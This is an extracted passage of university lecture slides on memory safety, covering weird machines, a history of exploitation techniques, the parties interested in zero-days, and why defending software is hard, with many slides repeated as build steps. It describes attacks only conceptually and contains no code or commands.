![Page 210: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/210.jpg)
More Memory Safety Violations www.tugraz.at
• There are many different memory safety violations
• All of them can get us into a weird state
• We have only seen 2 of them, but there are a lot more
• Memory safety violations are a “bag of tricks” from which we
can take one to get into a weird state
47 Michael Schwarz — www.iaik.tugraz.at
![Page 211: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/211.jpg)
More Memory Safety Violations www.tugraz.at
• There are many different memory safety violations
• All of them can get us into a weird state
• We have only seen 2 of them, but there are a lot more
• Memory safety violations are a “bag of tricks” from which we
can take one to get into a weird state
47 Michael Schwarz — www.iaik.tugraz.at
![Page 212: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/212.jpg)
More Memory Safety Violations www.tugraz.at
• There are many different memory safety violations
• All of them can get us into a weird state
• We have only seen 2 of them, but there are a lot more
• Memory safety violations are a “bag of tricks” from which we
can take one to get into a weird state
47 Michael Schwarz — www.iaik.tugraz.at
![Page 213: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/213.jpg)
More Memory Safety Violations www.tugraz.at
• There are many different memory safety violations
• All of them can get us into a weird state
• We have only seen 2 of them, but there are a lot more
• Memory safety violations are a “bag of tricks” from which we
can take one to get into a weird state
47 Michael Schwarz — www.iaik.tugraz.at
![Page 214: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/214.jpg)
More Powerful “Weird Programs” www.tugraz.at
• Our “weird machine programs” were quite simple
Ñ Jumped to a sane state of the FSM
• Instead
• Inject own code and jump to that
• Jump into the middle of a sane state
• ...
48 Michael Schwarz — www.iaik.tugraz.at
![Page 215: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/215.jpg)
More Powerful “Weird Programs” www.tugraz.at
• Our “weird machine programs” were quite simple
Ñ Jumped to a sane state of the FSM
• Instead
• Inject own code and jump to that
• Jump into the middle of a sane state
• ...
48 Michael Schwarz — www.iaik.tugraz.at
![Page 216: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/216.jpg)
More Powerful “Weird Programs” www.tugraz.at
• Our “weird machine programs” were quite simple
Ñ Jumped to a sane state of the FSM
• Instead
• Inject own code and jump to that
• Jump into the middle of a sane state
• ...
48 Michael Schwarz — www.iaik.tugraz.at
![Page 217: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/217.jpg)
More Powerful “Weird Programs” www.tugraz.at
• Our “weird machine programs” were quite simple
Ñ Jumped to a sane state of the FSM
• Instead
• Inject own code and jump to that
• Jump into the middle of a sane state
• ...
48 Michael Schwarz — www.iaik.tugraz.at
![Page 218: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/218.jpg)
More Powerful “Weird Programs” www.tugraz.at
• Our “weird machine programs” were quite simple
Ñ Jumped to a sane state of the FSM
• Instead
• Inject own code and jump to that
• Jump into the middle of a sane state
• ...
48 Michael Schwarz — www.iaik.tugraz.at
![Page 219: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/219.jpg)
More Powerful “Weird Programs” www.tugraz.at
• Our “weird machine programs” were quite simple
Ñ Jumped to a sane state of the FSM
• Instead
• Inject own code and jump to that
• Jump into the middle of a sane state
• ...
48 Michael Schwarz — www.iaik.tugraz.at
![Page 220: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/220.jpg)
“Programming Languages” for the Weird Machine www.tugraz.at
For three decades
• people came up with tricks to get into weird states,
• and “programming languages” to program weird machines
1985-1989 1990-1994 1995-1999 2000-2004 2005-2009 2010-2014 2015-now
Morris Worm(1988)
Stack BufferOverflow(1996)
Return-to-libc(1997)
Ret2libcchaining(2001)
Borrowed CodeChunks(2005)
Return-oriented-programming
(2007)
Blind ROP(2014)
Rowhammer(2015)
49 Michael Schwarz — www.iaik.tugraz.at
![Page 221: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/221.jpg)
That sounds interesting, I want to learn more! www.tugraz.at
• There are many techniques and cool tricks
• Did not look at them Ñ more important to understand concept
• Theory might be boring but helps understanding the techniques
• Participate in a CTF and try it yourself
50 Michael Schwarz — www.iaik.tugraz.at
![Page 222: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/222.jpg)
That sounds interesting, I want to learn more! www.tugraz.at
• There are many techniques and cool tricks
• Did not look at them Ñ more important to understand concept
• Theory might be boring but helps understanding the techniques
• Participate in a CTF and try it yourself
50 Michael Schwarz — www.iaik.tugraz.at
![Page 223: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/223.jpg)
That sounds interesting, I want to learn more! www.tugraz.at
• There are many techniques and cool tricks
• Did not look at them Ñ more important to understand concept
• Theory might be boring but helps understanding the techniques
• Participate in a CTF and try it yourself
50 Michael Schwarz — www.iaik.tugraz.at
![Page 224: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/224.jpg)
That sounds interesting, I want to learn more! www.tugraz.at
• There are many techniques and cool tricks
• Did not look at them Ñ more important to understand concept
• Theory might be boring but helps understanding the techniques
• Participate in a CTF and try it yourself
50 Michael Schwarz — www.iaik.tugraz.at
![Page 225: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/225.jpg)
Fix all the things www.tugraz.at
• We got rid of gets
• We got rid of the format-string vulnerability
• We could not find any other bugs
• The FSM emulator (= our code) looks secure
51 Michael Schwarz — www.iaik.tugraz.at
![Page 226: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/226.jpg)
Fix all the things www.tugraz.at
• We got rid of gets
• We got rid of the format-string vulnerability
• We could not find any other bugs
• The FSM emulator (= our code) looks secure
51 Michael Schwarz — www.iaik.tugraz.at
![Page 227: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/227.jpg)
Fix all the things www.tugraz.at
• We got rid of gets
• We got rid of the format-string vulnerability
• We could not find any other bugs
• The FSM emulator (= our code) looks secure
51 Michael Schwarz — www.iaik.tugraz.at
![Page 228: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/228.jpg)
Fix all the things www.tugraz.at
• We got rid of gets
• We got rid of the format-string vulnerability
• We could not find any other bugs
• The FSM emulator (= our code) looks secure
51 Michael Schwarz — www.iaik.tugraz.at
![Page 229: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/229.jpg)
Non-exploitable Code? www.tugraz.at
• Can we show that our code is now not exploitable?
• Not really Ñ check all weird states whether they are exploitable
• How to know which weird states are reachable?
• Depends on the attacker model Ñ what can an attacker do?
• Hard to think of attacker models not yet discovered
52 Michael Schwarz — www.iaik.tugraz.at
![Page 230: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/230.jpg)
Non-exploitable Code? www.tugraz.at
• Can we show that our code is now not exploitable?
• Not really Ñ check all weird states whether they are exploitable
• How to know which weird states are reachable?
• Depends on the attacker model Ñ what can an attacker do?
• Hard to think of attacker models not yet discovered
52 Michael Schwarz — www.iaik.tugraz.at
![Page 231: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/231.jpg)
Non-exploitable Code? www.tugraz.at
• Can we show that our code is now not exploitable?
• Not really Ñ check all weird states whether they are exploitable
• How to know which weird states are reachable?
• Depends on the attacker model Ñ what can an attacker do?
• Hard to think of attacker models not yet discovered
52 Michael Schwarz — www.iaik.tugraz.at
![Page 232: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/232.jpg)
Non-exploitable Code? www.tugraz.at
• Can we show that our code is now not exploitable?
• Not really Ñ check all weird states whether they are exploitable
• How to know which weird states are reachable?
• Depends on the attacker model Ñ what can an attacker do?
• Hard to think of attacker models not yet discovered
52 Michael Schwarz — www.iaik.tugraz.at
![Page 233: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/233.jpg)
Non-exploitable Code? www.tugraz.at
• Can we show that our code is now not exploitable?
• Not really Ñ check all weird states whether they are exploitable
• How to know which weird states are reachable?
• Depends on the attacker model Ñ what can an attacker do?
• Hard to think of attacker models not yet discovered
52 Michael Schwarz — www.iaik.tugraz.at
![Page 234: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/234.jpg)
Exploitation www.tugraz.at
• Who is interested in exploitation?
Criminals
BP
Vendors Governments
53 Michael Schwarz — www.iaik.tugraz.at
![Page 235: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/235.jpg)
Exploitation www.tugraz.at
• Who is interested in exploitation?
Criminals
BP
Vendors Governments
53 Michael Schwarz — www.iaik.tugraz.at
![Page 236: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/236.jpg)
Exploitation www.tugraz.at
• Who is interested in exploitation?
Criminals
BP
Vendors
Governments
53 Michael Schwarz — www.iaik.tugraz.at
![Page 237: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/237.jpg)
Exploitation www.tugraz.at
• Who is interested in exploitation?
Criminals
BP
Vendors Governments
53 Michael Schwarz — www.iaik.tugraz.at
![Page 238: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/238.jpg)
Zero-Days for Piracy www.tugraz.at
• Jailbreaks (e.g., getting root) on various devices:
• iOS (multiple exploits)
• Wii (buffer overflow in The Legend of Zelda: Twilight
Princess).
• PS2 (buffer overflow in the BIOS)
• PS3 (heap overflow)
• Xbox (buffer overflow in savegames)
54 Michael Schwarz — www.iaik.tugraz.at
![Page 239: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/239.jpg)
Zero-Days for Piracy www.tugraz.at
• Jailbreaks (e.g., getting root) on various devices:
• iOS (multiple exploits)
• Wii (buffer overflow in The Legend of Zelda: Twilight
Princess).
• PS2 (buffer overflow in the BIOS)
• PS3 (heap overflow)
• Xbox (buffer overflow in savegames)
54 Michael Schwarz — www.iaik.tugraz.at
![Page 240: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/240.jpg)
Zero-Days for Piracy www.tugraz.at
• Jailbreaks (e.g., getting root) on various devices:
• iOS (multiple exploits)
• Wii (buffer overflow in The Legend of Zelda: Twilight
Princess).
• PS2 (buffer overflow in the BIOS)
• PS3 (heap overflow)
• Xbox (buffer overflow in savegames)
54 Michael Schwarz — www.iaik.tugraz.at
![Page 241: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/241.jpg)
Zero-Days for Piracy www.tugraz.at
• Jailbreaks (e.g., getting root) on various devices:
• iOS (multiple exploits)
• Wii (buffer overflow in The Legend of Zelda: Twilight
Princess).
• PS2 (buffer overflow in the BIOS)
• PS3 (heap overflow)
• Xbox (buffer overflow in savegames)
54 Michael Schwarz — www.iaik.tugraz.at
![Page 242: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/242.jpg)
Zero-Days for Piracy www.tugraz.at
• Jailbreaks (e.g., getting root) on various devices:
• iOS (multiple exploits)
• Wii (buffer overflow in The Legend of Zelda: Twilight
Princess).
• PS2 (buffer overflow in the BIOS)
• PS3 (heap overflow)
• Xbox (buffer overflow in savegames)
54 Michael Schwarz — www.iaik.tugraz.at
![Page 243: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/243.jpg)
Zero-Days for Piracy www.tugraz.at
• Jailbreaks (e.g., getting root) on various devices:
• iOS (multiple exploits)
• Wii (buffer overflow in The Legend of Zelda: Twilight
Princess).
• PS2 (buffer overflow in the BIOS)
• PS3 (heap overflow)
• Xbox (buffer overflow in savegames)
54 Michael Schwarz — www.iaik.tugraz.at
![Page 244: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/244.jpg)
Bug Bounty Programs BP
www.tugraz.at
55 Michael Schwarz — www.iaik.tugraz.at
![Page 245: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/245.jpg)
Zero-Days in Government www.tugraz.at
• Computer and network surveillance
• Sometimes use state-sponsored trojan horses (govware)
• Bundestrojaner (Germany)
• MiniPanzer and MegaPanzer (Switzerland)
• “Sicherheitspaket” (Austria)
• NSA Exploits (Shadow Broker Leak)
56 Michael Schwarz — www.iaik.tugraz.at
![Page 246: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/246.jpg)
Zero-Days in Government www.tugraz.at
• Computer and network surveillance
• Sometimes use state-sponsored trojan horses (govware)
• Bundestrojaner (Germany)
• MiniPanzer and MegaPanzer (Switzerland)
• “Sicherheitspaket” (Austria)
• NSA Exploits (Shadow Broker Leak)
56 Michael Schwarz — www.iaik.tugraz.at
![Page 247: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/247.jpg)
Zero-Days in Government www.tugraz.at
• Computer and network surveillance
• Sometimes use state-sponsored trojan horses (govware)
• Bundestrojaner (Germany)
• MiniPanzer and MegaPanzer (Switzerland)
• “Sicherheitspaket” (Austria)
• NSA Exploits (Shadow Broker Leak)
56 Michael Schwarz — www.iaik.tugraz.at
![Page 248: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/248.jpg)
Zero-Days in Government www.tugraz.at
• Computer and network surveillance
• Sometimes use state-sponsored trojan horses (govware)
• Bundestrojaner (Germany)
• MiniPanzer and MegaPanzer (Switzerland)
• “Sicherheitspaket” (Austria)
• NSA Exploits (Shadow Broker Leak)
56 Michael Schwarz — www.iaik.tugraz.at
![Page 249: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/249.jpg)
Zero-Days in Government www.tugraz.at
• Computer and network surveillance
• Sometimes use state-sponsored trojan horses (govware)
• Bundestrojaner (Germany)
• MiniPanzer and MegaPanzer (Switzerland)
• “Sicherheitspaket” (Austria)
• NSA Exploits (Shadow Broker Leak)
56 Michael Schwarz — www.iaik.tugraz.at
![Page 250: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/250.jpg)
Zero-Days in Government www.tugraz.at
• Computer and network surveillance
• Sometimes use state-sponsored trojan horses (govware)
• Bundestrojaner (Germany)
• MiniPanzer and MegaPanzer (Switzerland)
• “Sicherheitspaket” (Austria)
• NSA Exploits (Shadow Broker Leak)
56 Michael Schwarz — www.iaik.tugraz.at
![Page 251: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/251.jpg)
Blue Team aka Defenses
Defenses
![Page 252: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/252.jpg)
We want to defend against attacks www.tugraz.at
• Defense in CS is surprisingly hard
• In “classical war games”, there is the 3:1 rule
Ñ An attacker needs 3 times as many soldiers as the defender
• Not a law (there are many exceptions) but rule of thumb
57 Michael Schwarz — www.iaik.tugraz.at
![Page 253: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/253.jpg)
We want to defend against attacks www.tugraz.at
• Defense in CS is surprisingly hard
• In “classical war games”, there is the 3:1 rule
Ñ An attacker needs 3 times as many soldiers as the defender
• Not a law (there are many exceptions) but rule of thumb
57 Michael Schwarz — www.iaik.tugraz.at
![Page 254: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/254.jpg)
We want to defend against attacks www.tugraz.at
• Defense in CS is surprisingly hard
• In “classical war games”, there is the 3:1 rule
Ñ An attacker needs 3 times as many soldiers as the defender
• Not a law (there are many exceptions) but rule of thumb
57 Michael Schwarz — www.iaik.tugraz.at
![Page 255: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/255.jpg)
We want to defend against attacks www.tugraz.at
• Defense in CS is surprisingly hard
• In “classical war games”, there is the 3:1 rule
Ñ An attacker needs 3 times as many soldiers as the defender
• Not a law (there are many exceptions) but rule of thumb
57 Michael Schwarz — www.iaik.tugraz.at
![Page 256: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/256.jpg)
The defender has a disadvantage www.tugraz.at
• In CS, the defender has a disadvantage
• Attacker: find one vulnerability
• Defender: protect against all possible attacks
• If the defender misses one vulnerability, the attacker wins
• “The best defense is a good offense” does not work
58 Michael Schwarz — www.iaik.tugraz.at
![Page 257: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/257.jpg)
The defender has a disadvantage www.tugraz.at
• In CS, the defender has a disadvantage
• Attacker: find one vulnerability
• Defender: protect against all possible attacks
• If the defender misses one vulnerability, the attacker wins
• “The best defense is a good offense” does not work
58 Michael Schwarz — www.iaik.tugraz.at
![Page 258: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/258.jpg)
The defender has a disadvantage www.tugraz.at
• In CS, the defender has a disadvantage
• Attacker: find one vulnerability
• Defender: protect against all possible attacks
• If the defender misses one vulnerability, the attacker wins
• “The best defense is a good offense” does not work
58 Michael Schwarz — www.iaik.tugraz.at
![Page 259: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/259.jpg)
The defender has a disadvantage www.tugraz.at
• In CS, the defender has a disadvantage
• Attacker: find one vulnerability
• Defender: protect against all possible attacks
• If the defender misses one vulnerability, the attacker wins
• “The best defense is a good offense” does not work
58 Michael Schwarz — www.iaik.tugraz.at
![Page 260: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/260.jpg)
The defender has a disadvantage www.tugraz.at
• In CS, the defender has a disadvantage
• Attacker: find one vulnerability
• Defender: protect against all possible attacks
• If the defender misses one vulnerability, the attacker wins
• “The best defense is a good offense” does not work
58 Michael Schwarz — www.iaik.tugraz.at
![Page 261: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/261.jpg)
What do we do in CS? www.tugraz.at
• Mainly two strategies
• Strategy #1: Red Team finds all bugs Ñ Blue Team fixes them
• Strategy #2: Find generic mechanisms Ñ Red Team cannot
exploit the program
59 Michael Schwarz — www.iaik.tugraz.at
![Page 262: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/262.jpg)
What do we do in CS? www.tugraz.at
• Mainly two strategies
• Strategy #1: Red Team finds all bugs Ñ Blue Team fixes them
• Strategy #2: Find generic mechanisms Ñ Red Team cannot
exploit the program
59 Michael Schwarz — www.iaik.tugraz.at
![Page 263: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/263.jpg)
What do we do in CS? www.tugraz.at
• Mainly two strategies
• Strategy #1: Red Team finds all bugs Ñ Blue Team fixes them
• Strategy #2: Find generic mechanisms Ñ Red Team cannot
exploit the program
59 Michael Schwarz — www.iaik.tugraz.at
![Page 264: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/264.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
• Often, Strategy #1 is used Ñ seems simple (and cheap)
• If a bug is discovered, fix it, done
• “It took an attacker/researcher more than n months to find a
bug, so the cost of finding the next bug is ě n months”
60 Michael Schwarz — www.iaik.tugraz.at
![Page 265: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/265.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
• Often, Strategy #1 is used Ñ seems simple (and cheap)
• If a bug is discovered, fix it, done
• “It took an attacker/researcher more than n months to find a
bug, so the cost of finding the next bug is ě n months”
60 Michael Schwarz — www.iaik.tugraz.at
![Page 266: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/266.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
• Often, Strategy #1 is used Ñ seems simple (and cheap)
• If a bug is discovered, fix it, done
• “It took an attacker/researcher more than n months to find a
bug, so the cost of finding the next bug is ě n months”
60 Michael Schwarz — www.iaik.tugraz.at
![Page 267: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/267.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
• Often, Strategy #1 is used Ñ seems simple (and cheap)
• If a bug is discovered, fix it, done
• “It took an attacker/researcher more than n months to find a
bug, so the cost of finding the next bug is ě n months”
60 Michael Schwarz — www.iaik.tugraz.at
![Page 268: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/268.jpg)
Re-cap: Weird machines www.tugraz.at
• We defined exploitation as a three-step procedure
1. Setup: choose sane state which “allows” getting to a weird state
2. Instantiation: transition from sane state to weird state
3. Programming: program the weird machine
• The fix prevents one weird machine (or its “program”)
• Similar bugs Ñ similar weird machines
61 Michael Schwarz — www.iaik.tugraz.at
![Page 269: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/269.jpg)
Re-cap: Weird machines www.tugraz.at
• We defined exploitation as a three-step procedure
1. Setup: choose sane state which “allows” getting to a weird state
2. Instantiation: transition from sane state to weird state
3. Programming: program the weird machine
• The fix prevents one weird machine (or its “program”)
• Similar bugs Ñ similar weird machines
61 Michael Schwarz — www.iaik.tugraz.at
![Page 270: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/270.jpg)
Re-cap: Weird machines www.tugraz.at
• We defined exploitation as a three-step procedure
1. Setup: choose sane state which “allows” getting to a weird state
